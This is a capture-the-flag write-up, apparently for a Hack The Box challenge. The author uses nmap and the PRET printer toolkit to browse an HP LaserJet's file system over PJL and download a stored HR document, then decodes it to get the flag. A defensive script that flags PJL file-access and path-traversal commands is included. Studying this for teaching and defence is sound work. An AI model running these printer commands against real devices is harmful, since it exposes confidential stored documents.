Gawk
3 minute read
We are told that someone needs help with a printer. All we have is an IP address and a port. nmap shows nothing useful:
$ nmap -Pn -sV 167.99.207.74 -p 32108
Starting Nmap 7.93 ( https://nmap.org )
Nmap scan report for 167.99.207.74
Host is up (0.079s latency).
PORT STATE SERVICE VERSION
32108/tcp open unknown
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.94 seconds
Using PJL
After reading a bit about printer exploitation, I found PRET, a tool for interacting with printers over PostScript or PJL (printer languages). It runs on Python version 2, so we will use a Docker container:
$ docker run --rm -v "${PWD}":/home/rocky -it python:2.7 bash
root@48962fe51979:/# pip2.7 install colorama
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Collecting colorama
Downloading colorama-0.4.6-py2.py3-none-any.whl (25 kB)
Installing collected packages: colorama
Successfully installed colorama-0.4.6
WARNING: You are using pip version 20.0.2; however, version 20.3.4 is available.
You should consider upgrading via the '/usr/local/bin/python -m pip install --upgrade pip' command.
root@48962fe51979:/# python2.7 /home/rocky/PRET/pret.py 167.99.207.74:32108 pjl
________________
_/_______________/|
/___________/___//|| PRET | Printer Exploitation Toolkit v0.40
|=== |----| || by Jens Mueller <jens.a.mueller@rub.de>
| | ô| ||
|___________| ô| ||
| ||/.´---.|| | || 「 pentesting tool that made
|-||/_____\||-. | |´ dumpster diving obsolete‥ 」
|_||=L==H==||_|__|/
(ASCII art by
Jan Foerster)
Connection to 167.99.207.74:32108 established
Device: hp LaserJet 4200
Welcome to the pret shell. Type help or ? to list commands.
167.99.207.74:32108:/>
We see that we have successfully connected to an HP LaserJet printer. These are the commands we can use:
167.99.207.74:32108:/> ?
Available commands (type help <topic>):
=======================================
append delete edit free info mkdir printenv set unlock
cat destroy env fuzz load nvram put site version
cd df exit get lock offline pwd status
chvol disable find help loop open reset timeout
close discover flood hold ls pagecount restart touch
debug display format id mirror print selftest traversal
For example:
167.99.207.74:32108:/> pwd
0:/
167.99.207.74:32108:/> ls
d - PJL
d - PostScript
d - saveDevice
d - webServer
Let's list every file and directory with find:
167.99.207.74:32108:/> find
/PJL/
/PostScript/
/saveDevice/
/saveDevice/SavedJobs/
/saveDevice/SavedJobs/InProgress/
/saveDevice/SavedJobs/InProgress/HR_Policies.pdf
/saveDevice/SavedJobs/KeepJob/
/webServer/
/webServer/default/
/webServer/default/csconfig
/webServer/home/
/webServer/home/device.html
/webServer/home/hostmanifest
/webServer/lib/
/webServer/lib/keys
/webServer/lib/security
/webServer/objects/
/webServer/permanent/
One file stands out (HR_Policies.pdf). Let's grab it:
167.99.207.74:32108:/> get /saveDevice/SavedJobs/InProgress/HR_Policies.pdf
41893 bytes received.
167.99.207.74:32108:/> exit
I expected a PDF file, but it is only ASCII data (in fact, a Base64-encoded string):
root@48962fe51979:/# file HR_Policies.pdf
HR_Policies.pdf: ASCII text
root@48962fe51979:/# cat HR_Policies.pdf
...
So let's decode it and save the result as a PDF:
root@48962fe51979:/# base64 -d HR_Policies.pdf > /home/rocky/HR_Policies.pdf
root@48962fe51979:/# file /home/rocky/HR_Policies.pdf
/home/rocky/HR_Policies.pdf: PDF document, version 1.4
root@48962fe51979:/# exit
exit
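PRET's pwd, ls, find and get commands in the session above reach the printer as PJL file-system commands (FSDIRLIST, FSQUERY, FSUPLOAD), which is what a defender watching a print port should look for. The script below is an added example, not code from this write-up or from PRET: it parses those commands out of a job stream and rates them, assuming the documented HP PJL keywords and a constructed sample stream that mirrors the ls/find/get steps.

```python
"""Flag PJL file-system access in a captured print-job stream (added example).
PRET's ls/find/get are sent as the PJL commands FSDIRLIST, FSQUERY and FSUPLOAD,
so a job carrying them is browsing or pulling stored files, not printing."""
import re

# Documented HP PJL file-system commands and what each one does.
FS_COMMANDS = {"FSDIRLIST": "directory listing", "FSQUERY": "file metadata query",
               "FSUPLOAD": "file read (printer -> client)",
               "FSDOWNLOAD": "file write (client -> printer)", "FSDELETE": "file delete"}
READ_WRITE = {"FSUPLOAD", "FSDOWNLOAD", "FSDELETE"}

# One PJL command per line; parameters are KEY=value or KEY="quoted value".
LINE_RE = re.compile(rb"@PJL\s+(FS[A-Z]+)([^\r\n]*)", re.IGNORECASE)
KV_RE = re.compile(rb'([A-Z]+)\s*=\s*("[^"]*"|\S+)', re.IGNORECASE)

def parse_pjl_fs(payload: bytes):
    """Return [(COMMAND, {PARAM: value})] for every PJL FS* line in payload."""
    found = []
    for m in LINE_RE.finditer(payload):
        cmd = m.group(1).decode("ascii").upper()
        params = {k.decode("ascii").upper(): v.decode("latin-1").strip('"')
                  for k, v in KV_RE.findall(m.group(2))}
        found.append((cmd, params))
    return found

def audit(payload: bytes):
    """Rate each FS command: HIGH for reads, writes, deletes or any '..' in the
    path (PJL path traversal); MEDIUM for plain listings and metadata queries."""
    findings = []
    for cmd, params in parse_pjl_fs(payload):
        if cmd not in FS_COMMANDS:  # unknown FS* keyword: leave it alone
            continue
        path = params.get("NAME", params.get("VOLUME", ""))
        level = "HIGH" if cmd in READ_WRITE or ".." in path else "MEDIUM"
        findings.append((level, cmd, path, FS_COMMANDS[cmd]))
    return findings

# Constructed stream (not a real capture): what PRET sends for ls, find and get,
# plus one traversal-style listing. \x1b%-12345X is the UEL framing of a PJL job.
SAMPLE_STREAM = (
    b"\x1b%-12345X@PJL INFO ID\r\n"  # device query, not file-system access
    b'@PJL FSDIRLIST NAME="0:\\" ENTRY=1 COUNT=65535\r\n'
    b'@PJL FSQUERY NAME="0:\\saveDevice\\SavedJobs\\InProgress\\HR_Policies.pdf"\r\n'
    b'@PJL FSUPLOAD NAME="0:\\saveDevice\\SavedJobs\\InProgress\\HR_Policies.pdf"'
    b" OFFSET=0 SIZE=41893\r\n"
    b'@PJL FSDIRLIST NAME="0:\\..\\..\\" ENTRY=1 COUNT=65535\r\n'
    b"\x1b%-12345X"
)
if __name__ == "__main__":
    for level, cmd, path, what in audit(SAMPLE_STREAM):
        print(f"[{level}] {cmd:<10} {what:<32} {path}")
```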
Flag
If we open the PDF, the flag is on the first page:
HTB{tr4v3rs3_m4n4g3ment_d3240!}